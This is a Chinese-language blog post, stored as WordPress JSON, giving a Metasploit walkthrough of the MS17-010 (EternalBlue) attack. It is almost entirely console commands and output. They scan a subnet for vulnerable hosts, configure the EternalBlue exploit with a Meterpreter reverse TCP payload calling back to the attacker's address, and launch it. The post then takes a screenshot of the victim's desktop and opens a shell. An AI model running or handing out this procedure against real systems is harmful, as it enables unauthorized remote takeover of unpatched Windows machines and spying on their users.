{"id":168,"date":"2019-01-25T19:48:15","date_gmt":"2019-01-25T11:48:15","guid":{"rendered":"http:\/\/h-k.pw\/?p=168"},"modified":"2019-01-25T19:48:16","modified_gmt":"2019-01-25T11:48:16","slug":"ms17010","status":"publish","type":"post","link":"https:\/\/harson.co\/index.php\/2019\/01\/25\/ms17010\/","title":{"rendered":"MS17010"},"content":{"rendered":"<h2>\u4e00\u3001\u9996\u5148\u68c0\u6d4b\u7f51\u6bb5\u5185\u5b58\u5728\u6f0f\u6d1e\u7684\u4e3b\u673a\u7cfb\u7edf<\/h2>\n<p>\u6253\u5f00msf<\/p>\n<pre>msfconsole\n\nmsf &gt; use auxiliary\/scanner\/smb\/smb_ms17_010        \/\/\u52a0\u8f7d\u626b\u63cfexp\nmsf auxiliary(scanner\/smb\/smb_ms17_010) &gt; set RHOSTS 192.168.22.1\/24    \/\/\u914d\u7f6e\u626b\u63cf\u7f51\u6bb5\nmsf auxiliary(scanner\/smb\/smb_ms17_010) &gt; run        \/\/\u8fdb\u884c\u626b\u63cf<\/pre>\n<h2>\u4e8c\u3001\u6f0f\u6d1e\u5229\u7528<\/h2>\n<pre>msf &gt; use exploit\/windows\/smb\/ms17_010_eternalblue          \/\/\u52a0\u8f7d\u653b\u51fb\u6a21\u5757\nmsf exploit(windows\/smb\/ms17_010_eternalblue) &gt; set RHOST 192.168.22.25      \/\/\u914d\u7f6e\u653b\u51fb\u76ee\u6807IP\nRHOSTS =&gt; 192.168.22.25\nmsf exploit(windows\/smb\/ms17_010_eternalblue) &gt; set LHOST 192.168.5.146        \/\/\u914d\u7f6e\u672c\u673aIP\nLHOST =&gt; 192.168.5.146\nmsf exploit(windows\/smb\/ms17_010_eternalblue) &gt; set payload windows\/x64\/meterpreter\/reverse_tcp     \/\/\u914d\u7f6e\u56de\u94fe\u65b9\u5f0f\npayload =&gt; windows\/x64\/meterpreter\/reverse_tcp\nmsf exploit(windows\/smb\/ms17_010_eternalblue) &gt;<\/pre>\n<p>\u67e5\u770b\u5f53\u524d\u914d\u7f6e\u7684payload<\/p>\n<pre>msf exploit(windows\/smb\/ms17_010_eternalblue) &gt; show options    \/\/\u67e5\u770b\u914d\u7f6e\u9009\u9879\n\nModule options (exploit\/windows\/smb\/ms17_010_eternalblue):\n\n   Name                Current Setting  Required  Description\n   ----                ---------------  --------  -----------\n   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.\n   GroomDelta          5                yes       The amount to increase the groom count by per try.\n   MaxExploitAttempts  3                yes       The number of times to retry the exploit.\n   ProcessName         spoolsv.exe      yes       Process to inject payload into.\n   RHOST               192.168.22.25    yes       The target address\n   RPORT               445              yes       The target port (TCP)\n   SMBDomain           .                no        (Optional) The Windows domain to use for authentication\n   SMBPass                              no        (Optional) The password for the specified username\n   SMBUser                              no        (Optional) The username to authenticate as\n   VerifyArch          true             yes       Check if remote architecture matches exploit Target.\n   VerifyTarget        true             yes       Check if remote OS matches exploit Target.\n\n\nPayload options (windows\/x64\/meterpreter\/reverse_tcp):\n\n   Name      Current Setting  Required  Description\n   ----      ---------------  --------  -----------\n   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)\n   LHOST     192.168.5.146    yes       The listen address\n   LPORT     4444             yes       The listen port\n\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Windows 7 and Server 2008 R2 (x64) All Service Packs\n\n\nmsf exploit(windows\/smb\/ms17_010_eternalblue) &gt;<\/pre>\n<h3>\u53d1\u8d77\u653b\u51fb\uff1a<\/h3>\n<pre>\u653b\u51fb\u547d\u4ee4\uff1a \nmsf exploit(windows\/smb\/ms17_010_eternalblue) &gt; exploit        \/\/\u53d1\u8d77\u653b\u51fb<\/pre>\n<h2>\u83b7\u53d6\u5bf9\u65b9\u7535\u8111\u684c\u9762\uff1a<\/h2>\n<pre>meterpreter &gt; screenshot\nScreenshot saved to: \/root\/RBDEvfGv.jpeg    \/\/\u53ef\u4ee5\u5230root\u76ee\u5f55\u4e0b \u67e5\u770b\u5bf9\u65b9\u7535\u8111\u7684\u622a\u5c4f\nshell \/\/\u83b7\u53d6shel\u6743\u9650\nchcp 65001 \/\/cmd\u663e\u793a\u4e2d\u6587<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u4e00\u3001\u9996\u5148\u68c0\u6d4b\u7f51\u6bb5\u5185\u5b58\u5728\u6f0f\u6d1e\u7684\u4e3b\u673a\u7cfb\u7edf \u6253\u5f00msf msfconsole msf &gt; use auxili [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"class_list":["post-168","post","type-post","status-publish","format-standard","hentry","category-security"],"_links":{"self":[{"href":"https:\/\/harson.co\/index.php\/wp-json\/wp\/v2\/posts\/168","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/harson.co\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/harson.co\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/harson.co\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/harson.co\/index.php\/wp-json\/wp\/v2\/comments?post=168"}],"version-history":[{"count":3,"href":"https:\/\/harson.co\/index.php\/wp-json\/wp\/v2\/posts\/168\/revisions"}],"predecessor-version":[{"id":171,"href":"https:\/\/harson.co\/index.php\/wp-json\/wp\/v2\/posts\/168\/revisions\/171"}],"wp:attachment":[{"href":"https:\/\/harson.co\/index.php\/wp-json\/wp\/v2\/media?parent=168"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/harson.co\/index.php\/wp-json\/wp\/v2\/categories?post=168"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/harson.co\/index.php\/wp-json\/wp\/v2\/tags?post=168"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}